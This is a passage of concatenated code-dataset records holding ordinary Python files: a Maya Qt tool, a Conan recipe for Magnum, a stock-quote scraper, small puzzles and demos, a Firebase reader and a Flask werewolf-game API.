File\",\n _dir,\n \"*.json\")\n if not filepath:\n return\n\n assert ext == \"*.json\", \"Wrong file type\"\n\n queued_items = self._get_queued_items()\n if not queued_items:\n self.log.error(\"No queued items to store\")\n return\n\n queue_data = commands.create_queue_out_data(queued_items)\n commands.save_to_json(filepath, {\"queue\": queue_data})\n\n def _on_load_queue(self):\n\n _dir = commands.get_workfolder()\n fdialog = QtWidgets.QFileDialog()\n filepath, ext = fdialog.getOpenFileName(self,\n \"Open File\",\n _dir,\n \"*.json\")\n\n with open(filepath, \"r\") as fp:\n queue_data = json.load(fp)\n\n if \"queue\" not in queue_data:\n raise RuntimeError(\"Invalid queue data\")\n\n valid_items = []\n items = commands.create_queue_in_data(queue_data[\"queue\"])\n for item in items:\n if self._validate_queue_entry(item):\n valid_items.append(item)\n\n self.log.info(\"Found %d new item(s)\" % len(valid_items))\n\n if self.queue_widgets.currentIndex() != 1:\n self.queue_widgets.setCurrentIndex(1)\n\n self.queue_model.add_items(valid_items)\n\n def _create_label(self, text):\n \"\"\"Lazy function to create a label\"\"\"\n\n title = QtWidgets.QLabel(text)\n title.setAlignment(QtCore.Qt.AlignCenter)\n title.setStyleSheet(\"font-weight: bold; font-size: 12px\")\n\n return title\n\n def _on_container_selection_changed(self):\n\n all_documents = []\n\n indices = self.container_view.get_indices()\n for idx in indices:\n data = idx.data(self._noderole)\n if data is None:\n continue\n\n _id = data.get(\"_id\", None)\n if not _id:\n continue\n\n all_documents.extend(data.get(\"looks\", []))\n\n self.document_model.clear()\n self.document_model.add_items(all_documents)\n\n def _get_all_assets(self):\n\n items = commands.get_all_assets()\n self.container_model.clear()\n self.container_view.setVisible(False)\n self.container_model.add_items(items)\n self.container_view.setVisible(True)\n\n def _create_queue_items(self):\n \"\"\"Create a queue item based on the selection\"\"\"\n\n documents = [document.data(self._noderole) for document in\n self.document_view.get_indices()]\n assert len(documents) > 0, \"Please select a look\"\n containers = [container.data(self._noderole) for container in\n self.container_view.get_indices()]\n\n items = []\n for data in containers:\n\n asset_name = data[\"asset\"][\"name\"]\n for doc in documents:\n version = doc[\"version\"].get(asset_name, None)\n if version is None:\n continue\n items.append({\"asset\": data[\"objectName\"],\n \"subset\": doc[\"subset\"],\n \"version\": version[\"name\"],\n \"document\": version})\n\n return items\n\n def _add_queue_items(self):\n\n if self.queue_widgets.currentIndex() != 1:\n self.queue_widgets.setCurrentIndex(1)\n\n items = self._create_queue_items()\n\n validated = []\n for item in items:\n valid = self._validate_queue_entry(item)\n if valid:\n validated.append(item)\n\n self.queue_model.add_items(validated)\n\n def _validate_queue_entry(self, entry):\n \"\"\"If an entry already exists return false\"\"\"\n\n parent = QtCore.QModelIndex()\n for row in range(self.queue_model.rowCount(parent)):\n idx = self.queue_model.index(row, 0, parent)\n data = idx.data(self._noderole)\n if entry == data:\n self.log.info(\"Already in queue\")\n return False\n\n return True\n\n def _get_queued_items(self):\n \"\"\"Get all queued items in form of dictionaries\n Returns:\n list\n \"\"\"\n\n items = []\n\n parent = QtCore.QModelIndex()\n for row in range(self.queue_model.rowCount(parent)):\n idx = self.queue_model.index(row, 0, parent)\n data = idx.data(self._noderole)\n items.append(data)\n\n return items\n\n def _remove_selected_queued(self):\n \"\"\"Remove selected item(s) from the queue\"\"\"\n\n model_index = QtCore.QModelIndex()\n\n active = self.queue_view.currentIndex()\n active_row = active.row()\n\n items = []\n for row in range(self.queue_model.rowCount(model_index)):\n idx = self.queue_model.index(row, 0, model_index)\n index_data = idx.data(self._noderole)\n items.append(index_data)\n\n items.pop(active_row)\n\n self.queue_model.clear()\n if not items:\n self.queue_widgets.setCurrentIndex(0)\n return\n\n self.queue_model.add_items(items)\n\n def _clear_queue(self):\n self.queue_widgets.setCurrentIndex(0)\n self.queue_model.clear()\n\n def _apply_from_selection(self):\n items = self._create_queue_items()\n for item in items:\n commands.process_queued_item(item)\n\n def _apply_from_queue(self):\n \"\"\"Apply the look based on the queued looks\"\"\"\n\n # Get queued items\n items = self._get_queued_items()\n if not items:\n self.log.error(\"No look selected\")\n return\n for item in items:\n commands.process_queued_item(item)\n\n\ndef show(root=None, debug=False, parent=None):\n \"\"\"Display Loader GUI\n\n Arguments:\n debug (bool, optional): Run loader in debug-mode,\n defaults to False\n\n \"\"\"\n\n try:\n module.window.close()\n del module.window\n except (RuntimeError, AttributeError):\n pass\n\n with tools_lib.application():\n window = App(parent)\n window.show()\n\n module.window = window\n","sub_path":"mayalookassigner/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357177265","text":"import os\nimport sys\nimport unittest\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom workbench_utils import execute_bootstrap_script\n\n\nclass TestExecuteBootstrapScript(unittest.TestCase):\n\n def setUp(self):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n self.script_path = os.path.join(dir_path, 'assets', 'execute_bootstrap_script_test', 'script.py')\n self.config_file_path = os.path.join(dir_path, 'assets', 'execute_bootstrap_script_test', 'config.yml')\n\n def test_python_script(self):\n output, return_code = execute_bootstrap_script(self.script_path, self.config_file_path)\n self.assertEqual(output.strip(), b'Hello')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/ExecuteBootstrapScriptTest.py","file_name":"ExecuteBootstrapScriptTest.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144556483","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom conan import ConanFile\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout, CMakeDeps\nfrom conan.tools.scm import Git\nfrom conan.tools.files import load, update_conandata, copy, collect_libs, get, replace_in_file\nfrom conan.tools.microsoft.visual import check_min_vs\nfrom conan.tools.system.package_manager import Apt\nimport os\n\n\ndef sort_libs(correct_order, libs, lib_suffix='', reverse_result=False):\n # Add suffix for correct string matching\n correct_order[:] = [s.__add__(lib_suffix) for s in correct_order]\n\n result = []\n for expectedLib in correct_order:\n for lib in libs:\n if expectedLib == lib:\n result.append(lib)\n\n if reverse_result:\n # Linking happens in reversed order\n result.reverse()\n\n return result\n\n\nclass LibnameConan(ConanFile):\n name = \"magnum\"\n version = \"2020.06\"\n description = \"Magnum — Lightweight and modular C++11/C++14 \\\n graphics middleware for games and data visualization\"\n # topics can get used for searches, GitHub topics, Bintray tags etc. Add here keywords about the library\n topics = (\"conan\", \"corrade\", \"graphics\", \"rendering\", \"3d\", \"2d\", \"opengl\")\n url = \"https://github.com/TUM-CONAN/conan-magnum\"\n homepage = \"https://magnum.graphics\"\n author = \"ulrich eck (forked on github)\"\n license = \"MIT\"\n exports = [\"LICENSE.md\"]\n exports_sources = [\"CMakeLists.txt\"]\n\n # Options may need to change depending on the packaged library.\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False], \n \"fPIC\": [True, False],\n \"build_deprecated\": [True, False],\n \"build_plugins_static\": [True, False],\n \"target_gl\": [True, False],\n \"target_gles\": [True, False],\n \"with_anyaudioimporter\": [True, False],\n \"with_anyimageconverter\": [True, False],\n \"with_anyimageimporter\": [True, False],\n \"with_anysceneimporter\": [True, False],\n \"with_audio\": [True, False],\n \"with_debugtools\": [True, False],\n \"with_distancefieldconverter\": [True, False],\n \"with_eglcontext\": [True, False],\n \"with_fontconverter\": [True, False],\n \"with_glfwapplication\": [True, False],\n \"with_glxapplication\": [True, False],\n \"with_glxcontext\": [True, False],\n \"with_wglcontext\": [True, False],\n \"with_gl_info\": [True, False],\n \"with_imageconverter\": [True, False],\n \"with_magnumfont\": [True, False],\n \"with_magnumfontconverter\": [True, False],\n \"with_meshtools\": [True, False],\n \"with_objimporter\": [True, False],\n \"with_opengltester\": [True, False],\n \"with_primitives\": [True, False],\n \"with_scenegraph\": [True, False],\n \"with_sdl2application\": [True, False],\n \"with_shaders\": [True, False],\n \"with_text\": [True, False],\n \"with_tgaimageconverter\": [True, False],\n \"with_tgaimporter\": [True, False],\n \"with_vk\": [True, False],\n \"with_wavaudioimporter\": [True, False],\n \"with_windowlesswglapplication\": [True, False],\n \"with_windowlesseglapplication\": [True, False],\n \"with_windowlesscglapplication\": [True, False],\n \"with_windowlessglxapplication\": [True, False],\n \"with_xeglapplication\": [True, False],\n }\n\n default_options = {\n \"shared\": False, \n \"fPIC\": True,\n \"build_deprecated\": False,\n \"build_plugins_static\": False,\n \"target_gl\": True,\n \"target_gles\": False,\n \"with_anyaudioimporter\": False,\n \"with_anyimageconverter\": False,\n \"with_anyimageimporter\": False,\n \"with_anysceneimporter\": False,\n \"with_audio\": False,\n \"with_debugtools\": True,\n \"with_distancefieldconverter\": False,\n \"with_eglcontext\": False,\n \"with_fontconverter\": False,\n \"with_glfwapplication\": True,\n \"with_glxapplication\": False,\n \"with_glxcontext\": False,\n \"with_wglcontext\": False,\n \"with_gl_info\": False,\n \"with_imageconverter\": False,\n \"with_magnumfont\": False,\n \"with_magnumfontconverter\": False,\n \"with_meshtools\": True,\n \"with_objimporter\": False,\n \"with_opengltester\": False,\n \"with_primitives\": True,\n \"with_scenegraph\": True,\n \"with_sdl2application\": False,\n \"with_shaders\": True,\n \"with_text\": True,\n \"with_tgaimageconverter\": False,\n \"with_tgaimporter\": False,\n \"with_vk\": False,\n \"with_wavaudioimporter\": False,\n \"with_windowlesswglapplication\": False,\n \"with_windowlesseglapplication\": False,\n \"with_windowlesscglapplication\": False,\n \"with_windowlessglxapplication\": False,\n \"with_xeglapplication\": False,\n \"corrade/*:build_deprecated\": True,\n }\n\n def system_requirements(self):\n apt = Apt(self)\n packages = []\n if self.options.target_gl:\n packages.append(\"libgl1-mesa-dev\")\n if self.options.target_gles:\n packages.append(\"libgles1-mesa-dev\")\n missing = apt.check(packages)\n if missing:\n self.output.error(\"Warning: Missing system packages: {}\".format(missing))\n\n def config_options(self):\n if self.settings.os == 'Windows':\n del self.options.fPIC\n\n def configure(self):\n self.options['corrade']['build_deprecated'] = self.options.build_deprecated\n\n # To fix issue with resource management, see here:\n # https://github.com/mosra/magnum/issues/304#issuecomment-451768389\n if self.options.shared:\n self.options['corrade']['shared'] = True\n\n def requirements(self):\n self.requires(\"corrade/2020.06@camposs/stable\")\n self.requires(\"opengl/system\")\n if self.options.with_sdl2application:\n self.requires(\"sdl/2.26.1\")\n if self.options.with_glfwapplication:\n self.requires(\"glfw/3.3.8\")\n\n def validate(self):\n if self.settings.os == \"Windows\":\n check_min_vs(self, \"141\")\n\n def export(self):\n update_conandata(self, {\"sources\": {\n \"commit\": \"v{}\".format(self.version),\n \"url\": \"https://github.com/mosra/magnum.git\"\n }}\n )\n\n def source(self):\n git = Git(self)\n sources = self.conan_data[\"sources\"]\n git.clone(url=sources[\"url\"], target=self.source_folder)\n git.checkout(commit=sources[\"commit\"])\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"),\n \"find_package(Corrade REQUIRED Utility)\",\n \"cmake_policy(SET CMP0074 NEW)\\nfind_package(Corrade REQUIRED Utility)\")\n\n def generate(self):\n tc = CMakeToolchain(self)\n\n def add_cmake_option(option, value):\n var_name = \"{}\".format(option).upper()\n value_str = \"{}\".format(value)\n var_value = \"ON\" if value_str == 'True' else \"OFF\" if value_str == 'False' else value_str \n tc.variables[var_name] = var_value\n\n for option, value in self.options.items():\n add_cmake_option(option, value)\n\n # Corrade uses suffix on the resulting 'lib'-folder when running cmake.install()\n # Set it explicitly to empty, else Corrade might set it implicitly (eg. to \"64\")\n add_cmake_option(\"LIB_SUFFIX\", \"\")\n\n add_cmake_option(\"BUILD_STATIC\", not self.options.shared)\n add_cmake_option(\"BUILD_STATIC_PIC\", not self.options.shared and self.options.get_safe(\"fPIC\"))\n corrade_root = self.dependencies[\"corrade\"].package_folder\n # on windows change to unix style path, as are all other paths\n if self.settings.os == 'Windows':\n corrade_root = corrade_root.replace('\\\\', '/') \n tc.variables[\"Corrade_ROOT\"] = corrade_root\n\n tc.generate()\n\n deps = CMakeDeps(self)\n deps.set_property(\"corrade\", \"cmake_find_mode\", \"none\")\n deps.set_property(\"glfw\", \"cmake_find_mode\", \"none\")\n deps.generate()\n\n def layout(self):\n cmake_layout(self, src_folder=\"source_subfolder\")\n\n def build(self):\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, pattern=\"LICENSE\", dst=\"licenses\", src=self.source_folder)\n cmake = CMake(self)\n cmake.install()\n\n def package_info(self):\n # See dependency order here: https://doc.magnum.graphics/magnum/custom-buildsystems.html\n all_libs = [\n #1\n \"Magnum\",\n \"MagnumAnimation\",\n \"MagnumMath\",\n #2\n \"MagnumAudio\",\n \"MagnumGL\",\n \"MagnumSceneGraph\",\n \"MagnumTrade\",\n \"MagnumVk\",\n #3\n \"MagnumMeshTools\",\n \"MagnumPrimitives\",\n \"MagnumShaders\",\n \"MagnumTextureTools\",\n \"MagnumGlfwApplication\",\n \"MagnumXEglApplication\",\n \"MagnumWindowlessEglApplication\",\n \"MagnumGlxApplication\" ,\n \"MagnumWindowlessGlxApplication\",\n \"MagnumSdl2Application\",\n \"MagnumWindowlessSdl2Application\",\n \"MagnumWindowlessWglApplication\",\n \"MagnumWindowlessCglApplication\",\n #4\n \"MagnumDebugTools\",\n \"MagnumOpenGLTester\",\n \"MagnumText\",\n ]\n \n # Sort all built libs according to above, and reverse result for correct link order\n suffix = '-d' if self.settings.build_type == \"Debug\" else ''\n built_libs = collect_libs(self)\n self.cpp_info.libs = sort_libs(correct_order=all_libs, libs=built_libs, lib_suffix=suffix, reverse_result=True)\n\n if self.settings.os == \"Windows\":\n if self.settings.compiler == \"msvc\":\n if not self.options.shared:\n self.cpp_info.system_libs.append(\"OpenGL32.lib\")\n else:\n self.cpp_info.system_libs.append(\"opengl32\")\n else:\n if self.settings.os == \"Macos\":\n self.cpp_info.exelinkflags.append(\"-framework OpenGL\")\n elif not self.options.shared:\n self.cpp_info.system_libs.append(\"GL\")\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"383843848","text":"#----------------------------------------------\n# Programa DESAFIO SJC para Semantix - Arquivo principal\n# Programador: Vitor Zago\n# Data: 08/04/2020\n# Versão 1.2\n#----------------------------------------------\n\nimport datetime\nimport time\nimport csv\nimport os\nimport requests\nimport InterpretacaoHTMLBolsa as ParseHTMLBolsa\nimport InterpretacaoHTMLMoeda as ParseHTMLMoeda\nimport sys\nimport RepositorioDado\n\n# Parâmetros Gerais\n# nome do arquivo com os endereços para importação das ações\narquivoListaUrlCotacao = 'Config/listaUrlCotacaoBolsa.csv'\narquivoListaUrlCotacaoMoeda = 'Config/listaUrlCotacaoMoeda.csv'\narquivoBaseDado = 'BancoDado.db'\n\nsubPastaArquivoConversao = 'Arquivo'\nintervaloRequisicao = 2 * 60 # 2 minutos - Tempo em segundos\n\n# Enganar o site fingindo a requisição ser do Mozila Firefox\n# Sem isso, o servidor recusava a requisição\nuser_agent = {'User-agent': 'Mozilla/5.0'}\n\n#Definição da classe padrão de Url de Cotação\nclass UrlCotacao:\n def __init__(self, _bolsa, _url, _moeda):\n self.bolsa = _bolsa # Nome da Bolsa\n self.url = _url\n self.moeda = _moeda\n \n # Contem a lista de Cotacao\n self.listaCotacao = None\n \n def __repr__(self):\n return 'Url: ' + self.url + ' Moeda: ' + self.moeda + ' Bolsa: ' + self.bolsa\n \n def redefinir(self):\n self.listaCotacao = None\n \n\nclass UrlCotacaoMoeda:\n def __init__(self, _mOrigem, _mDestino, _url):\n self.moedaOrigem = _mOrigem\n self.moedaDestino = _mDestino\n self.url = _url\n \n # Cotacao Referente\n self.cotacaoMoeda = None\n \n def __repr__(self):\n return 'Url: ' + self.url + ' Moeda Origem: ' + self.moedaOrigem + ' Moeda Destino: ' + self.moedaDestino\n \n def redefinir(self):\n self.cotacaoMoeda = None\n\n# Verifica se a subPasta Existe e cria se necessário\ndef verificarSubpasta(nomeCaminho):\n if not os.path.exists(nomeCaminho):\n os.mkdir(nomeCaminho)\n\n# --------------------------------------- \n# Função de gravação de Cotação de Ações convertidas\n# --------------------------------------- \ndef gravarCotacaoConvertido(listaCotacaoConvertido, nomeArquivo):\n \n verificarSubpasta(subPastaArquivoConversao)\n \n caminhoArquivoSaida = os.path.join(subPastaArquivoConversao, nomeArquivo)\n \n with open(caminhoArquivoSaida, 'w', newline='') as csvfile:\n gravadorCSV = csv.writer(csvfile, delimiter=';', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n \n # Cabeçalho\n gravadorCSV.writerow(['name','last_rs','high_rs','low_rs','last_usd','high_usd', 'low_usd','chg','chg_perc','vol','time']) \n \n # Dados\n for cotacao in listaCotacaoConvertido:\n gravadorCSV.writerow([cotacao.nome, cotacao.last_conv, cotacao.high_conv, cotacao.low_conv, cotacao.last, cotacao.high, cotacao.low, cotacao.chg, cotacao.chgP, cotacao.vol, cotacao.time])\n\n# --------------------------------------- \n# Função de requisição de endereço da internet\n# --------------------------------------- \ndef requisitarEndereco(enderecoUrl, caminhoSaida = ''):\n \n # Resgatando informação do SITE\n req = requests.get(enderecoUrl, headers = user_agent)\n print(\"Url: \", req.url, \" Código retorno:\", req.status_code)\n \n if not caminhoSaida is None and len(caminhoSaida) > 0:\n with open(caminhoSaida,'wb') as gravadorArquivo:\n gravadorArquivo.write(req.content)\n print('Arquivo salvo em ', caminhoSaida)\n\n return req\n\n# --------------------------------------- \n# Função de importação de conteudo de bolsa\n# --------------------------------------- \ndef importarConteudoSiteBolsa(urlCotacao, caminhoSaida = ''):\n \n # Requisitando URL\n req = requisitarEndereco(urlCotacao.url, caminhoSaida)\n \n # Criado objetos de Cotação / Ação\n listaCotacaoParcial = ParseHTMLBolsa.getListaCotacaoPorConteudo(req.text)\n for cotacao in listaCotacaoParcial:\n cotacao.moeda = urlCotacao.moeda\n print('Encontrado', len(listaCotacaoParcial), 'cotações.')\n urlCotacao.listaCotacao = listaCotacaoParcial \n \n return listaCotacaoParcial\n \n# --------------------------------------- \n# Função de importação de conteudo de Moeda\n# --------------------------------------- \ndef importarConteudoSiteMoeda(urlCotacaoMoeda, caminhoSaida = ''):\n # Requisitando URL\n req = requisitarEndereco(urlCotacaoMoeda.url, caminhoSaida)\n \n # Criado objetos de Cotação de moeda\n cotacaoMoeda = ParseHTMLMoeda.getCotacaoMoedaPorConteudo(req.text)\n urlCotacaoMoeda.cotacaoMoeda = cotacaoMoeda\n\n return cotacaoMoeda\n \n# --------------------------------------- \n# Função de conversão de Cotação da Bolsa\n# --------------------------------------- \ndef converterCotacao(urlCotacao, moedaDestino, nomeArquivoConvertido = ''):\n print('Necessário conversão:')\n mOrigem = urlCotacao.moeda\n mDestino = moedaDestino\n\n cotacaoConversao = next( (x for x in iter(listaUrlCotacaoMoeda) if x.moedaOrigem == mOrigem and x.moedaDestino == mDestino), None)\n if cotacaoConversao is None:\n print('Não convertido. Não definido cotação para conversão de', mOrigem, 'para', mDestino, '!')\n else:\n fatorConversao = cotacaoConversao.cotacaoMoeda.cotacao\n print('Fator de conversão:', fatorConversao)\n for cotacaoBolsa in urlCotacao.listaCotacao:\n cotacaoBolsa.converterMoeda('R$', fatorConversao)\n \n if not nomeArquivoConvertido is None and nomeArquivoConvertido != '':\n gravarCotacaoConvertido(urlCotacao.listaCotacao, nomeArquivoConvertido)\n\n#------------------------------------------\n# MAIN - LOOP Principal\n#------------------------------------------\n\n# Preparando url de resgate\nlistaUrlCotacao = []\nlistaUrlCotacaoMoeda = []\nwith open(arquivoListaUrlCotacao, 'r') as arquivoCsv:\n leitorCSV = csv.reader(arquivoCsv, delimiter=';', quotechar='\"')\n for linha in leitorCSV:\n if len(linha) >= 3:\n urlCotacao = UrlCotacao(linha[0], linha[1], linha[2]) # Nome Bolsa;URL;Moeda\n listaUrlCotacao.append(urlCotacao)\n\nwith open(arquivoListaUrlCotacaoMoeda, 'r') as arquivoCsv:\n leitorCSV = csv.reader(arquivoCsv, delimiter=';', quotechar='\"')\n for linha in leitorCSV:\n if len(linha) >= 3:\n urlCotacaoMoeda = UrlCotacaoMoeda(linha[0], linha[1], linha[2]) # Moeda Origem; Moeda Destino; Url\n listaUrlCotacaoMoeda.append(urlCotacaoMoeda)\n\nif len(listaUrlCotacao) == 0:\n raise Exception('Nenhuma Url de cotação definida.')\n\n# LOOP Principal\nrep = RepositorioDado.Repositorio(arquivoBaseDado)\nnumRequisicao = 0 \nprint('Iniciando LOOP principal')\nwhile True:\n try:\n # Redefinindo lista de cotação na bolsa\n for enderecoUrl in listaUrlCotacao:\n enderecoUrl.redefinir()\n \n # Redefinindo conversao de moeda\n for enderecoUrl in listaUrlCotacaoMoeda:\n enderecoUrl.redefinir()\n \n exatoInstante = datetime.datetime.now()\n print('Requisição nº', (numRequisicao + 1), exatoInstante)\n \n # Fazendo e atualizado as cotações\n contador = 1\n for enderecoUrl in listaUrlCotacao:\n importarConteudoSiteBolsa(enderecoUrl, 'Site' + str(contador) + '.HTML')\n rep.salvarListaCotacaoAcao(enderecoUrl, exatoInstante)\n contador += 1\n \n for enderecoUrlMoeda in listaUrlCotacaoMoeda:\n importarConteudoSiteMoeda(enderecoUrlMoeda, 'CotacaoMoeda.HTML')\n rep.salvarCotacaoMoeda(enderecoUrlMoeda, exatoInstante)\n \n # Verificando necessidade de conversão\n for bolsaValor in listaUrlCotacao:\n if bolsaValor.moeda != 'R$':\n nomeArquivoConvertido = exatoInstante.strftime(\"%Y%m%dT%H%M%S\") + '_' + urlCotacao.bolsa + '.csv'\n converterCotacao(bolsaValor, 'R$', nomeArquivoConvertido)\n except:\n print('Ocorreu algum erro nesta requisição. Verifique o acesso a internet e tente novamente', sys.exc_info()[0])\n \n print('Fim da requisição nº', (numRequisicao + 1), '. Aguardando para próxima requisição.')\n time.sleep(intervaloRequisicao) \n numRequisicao += 1 ## Imcrementar para p´roxima requisição\n\n# Obrigado pela oportunidade \n\n\n\n","sub_path":"src/Desafio_ProjetoSJC.py","file_name":"Desafio_ProjetoSJC.py","file_ext":"py","file_size_in_byte":8409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33275981","text":"\"\"\"\nThis problem was asked by Apple.\n\nSuppose you have a multiplication table that is N by N. That is, a 2D array\nwhere the value at the i-th row and j-th column is (i + 1) * (j + 1) (if\n0-indexed) or i * j (if 1-indexed).\n\nGiven integers N and X, write a function that returns the number of times X\nappears as a value in an N by N multiplication table.\n\nFor example, given N = 6 and X = 12, you should return 4, since the\nmultiplication table looks like this:\n\n| 1 | 2 | 3 | 4 | 5 | 6 |\n\n| 2 | 4 | 6 | 8 | 10 | 12 |\n\n| 3 | 6 | 9 | 12 | 15 | 18 |\n\n| 4 | 8 | 12 | 16 | 20 | 24 |\n\n| 5 | 10 | 15 | 20 | 25 | 30 |\n\n| 6 | 12 | 18 | 24 | 30 | 36 |\n\nAnd there are 4 12's in the table.\n\"\"\"\nfrom utils import units\n\n\ndef check_multiplication_table(N, X):\n counter = 0 if X > N else 1\n for n in range(2, N + 1):\n q, r = divmod(X, n)\n if r == 0:\n counter += 1\n\n return counter\n\n\nif __name__ == '__main__':\n N = int(input(\"N : \"))\n X = int(input(\"X : \"))\n result = check_multiplication_table(N, X)\n print(\"{} appears {}\".format(X, units(result, \"time\")))\n","sub_path":"problems/dcp0074.py","file_name":"dcp0074.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556610476","text":"import turtle\n\nFONT_NAME = \"Arial\" \nFONT_SIZE = 30\nFONT_STYLE = \"normal\"\nTEXT_ALIGN = \"center\"\n\ndef write_text(the_turtle,text,x,y):\n the_turtle.setposition(x, y)\n the_turtle.write(text, align=TEXT_ALIGN, font=(FONT_NAME, FONT_SIZE, FONT_STYLE))\n\ndef left_node_index(node_index):\n\treturn node_index * 2 + 1\n\ndef right_node_index(node_index):\n\treturn node_index * 2 + 2\n\ndef draw_node(my_turtle,node,x,y):\n\tmy_turtle.penup()\n\tmy_turtle.setpos(x,y)\n\tmy_turtle.pendown()\n\tmy_turtle.circle(20)\n\twrite_text(my_turtle,str(node),x,y)\n\ndef draw_binary_tree(my_turtle,tree,node_index,x,y):\n\tif node_index < len(tree):\n\t\tdraw_node(my_turtle,tree[node_index],x,y)\n\t\tx_move = 20*len(tree)/(node_index+1)\n\t\ty_move = y-50\n\t\tdraw_binary_tree(my_turtle,tree,left_node_index(node_index),x-x_move,y_move)\n\t\tmy_turtle.setpos(x,y)\n\t\tdraw_binary_tree(my_turtle,tree,right_node_index(node_index),x+x_move,y_move)\n\t\tmy_turtle.setpos(x,y)\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"black\")\nbinary = turtle.Turtle()\nbinary.shape(\"turtle\")\nbinary.color(\"white\")\nbinary.pensize(2)\n\ntree = [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"14\"]\nint_tree = [int(numeric_string) for numeric_string in tree]\n\ndraw_binary_tree(binary,int_tree,int_tree[0],0,100)\n\nwindow.exitonclick()","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69585006","text":"import sys\nsys.path.append('src') \nfrom constants import constants\nimport json\nfrom utils.file_utils import load_dict\nimport processing.text_setup as text_setup\nfrom data.editor_content import EditorContent\nfrom editor.content_setup import set_title, set_tags, set_credits, get_language_refs\nfrom langdetect import detect\nimport jsonpickle\n\ninput_file = constants.BASE_INFO\ntranslation_file = constants.TRANSLATION\noriginal_rom_file = constants.ORIGINAL\ncontent_file = constants.CONTENT\n\ndef save_translation_txt(translation_file, translation):\n with open(translation_file,'w') as translation_file:\n translation_file.write(translation)\n\ndef save_original_txt(original_rom_file, original_rom_text):\n with open(original_rom_file,'w') as original_rom:\n original_rom.write(original_rom_text)\n\ndef save_editor_content(song_data):\n editor_content = EditorContent()\n language_refs = get_language_refs(detect(song_data['original']))\n editor_content.title = set_title(song_data['artist'], song_data['song_name'])\n editor_content.translation = song_data['translation']\n editor_content.original = text_setup.mix_original_transliteration(song_data['original'], song_data['transliteration'])\n editor_content.tags = set_tags(song_data['artist'], song_data['song_name'], language_refs)\n editor_content.credits = set_credits(song_data['original_url'], song_data['transliteration_url'], song_data['translation_url'], language_refs)\n editor_content.video_code = \"\"\n return editor_content\n\ndef process_text():\n song_data = load_dict(input_file)\n editor_content = save_editor_content(song_data)\n with open(content_file, 'w') as outfile:\n json.dump(jsonpickle.encode(editor_content), outfile)\n print(\"Todo guardado\")\n\nif __name__ == '__main__':\n process_text()","sub_path":"src/application/text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322242660","text":"# Import database module.\nimport firebase_admin\nimport json\nfrom firebase_admin import db\nfrom firebase_admin import credentials\n\ndef fetchFromDb():\n # Fetch the service account key JSON file contents\n cred = credentials.Certificate('./firebase/messaging-18f15-firebase-adminsdk-st2pm-ae4e8ed57e.json')\n # Initialize the app with a service account, granting admin privileges\n\n try:\n firebase_admin.initialize_app(cred, {\n 'databaseURL': 'https://messaging-18f15.firebaseio.com/'\n })\n except:\n print(\"Error Caught\")\n\n # Get a database reference to our posts\n ref = db.reference('posts')\n\n # Read the data at the posts reference (this is a blocking operation)\n data = json.dumps(ref.get())\n\n info = json.loads(data)\n\n location = list(info.items())[-1]\n return location[1]['body']","sub_path":"MainPyQtGUI/test_path/firebase/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286161848","text":"from flask import abort, Blueprint, g, jsonify, request\n\nfrom app import db\nfrom app.models import Game, Role, Player\n\nnew_game_controller = Blueprint('new_game_controller', __name__, url_prefix='/api/v1/game')\ngames_controller = Blueprint('games_controller', __name__, url_prefix='/api/v1/game/<int:game_id>')\n\ncant_find_game = { 'error': { 'message': 'The game could either not be found or inaccessible.' } }\ncant_find_role = { 'error': { 'message': 'One of the roles could not be found.' } }\n\n@new_game_controller.route('/new', methods=['POST'])\ndef new():\n \"\"\"\n Create a new Ultimate Werewolf game with the roles\n and number desired.\n \"\"\"\n if len(g.request_json['roles']) < g.request_json['num_center_roles'] + 1:\n abort(400)\n\n new_game = Game()\n\n for role in g.request_json['roles']:\n for _ in xrange(role['count']):\n db_role = Role.query.filter_by(name=role['name']).first()\n if not db_role:\n return jsonify(cant_find_role)\n new_game.players.append(Player(orig_role=db_role, center=False))\n\n for i in xrange(g.request_json['num_center_roles']):\n new_game.players[i].center = True\n\n g.api_key.games.append(new_game)\n db.session.commit()\n return jsonify(new_game.serialize())\n\n@games_controller.url_value_preprocessor\ndef pull_game_id(endpoint, values):\n \"\"\"\n Set Game Variable\n \"\"\"\n g.game = Game.query.filter_by(id=values.pop('game_id', None), api_key_id=g.api_key.id).first()\n if not g.game:\n return jsonify(cant_find_game)\n\n@games_controller.route('/')\ndef get():\n return jsonify(g.game.serialize())\n\n@games_controller.route('/start')\ndef start():\n available_roles = g.game.roles()\n available_roles.shuffle()\n\n for p in g.game.players:\n p.orig_role = available_roles.pop()\n\n return jsonify({ 'success': 'true' }), 200\n\n@games_controller.route('/end')\ndef end():\n return 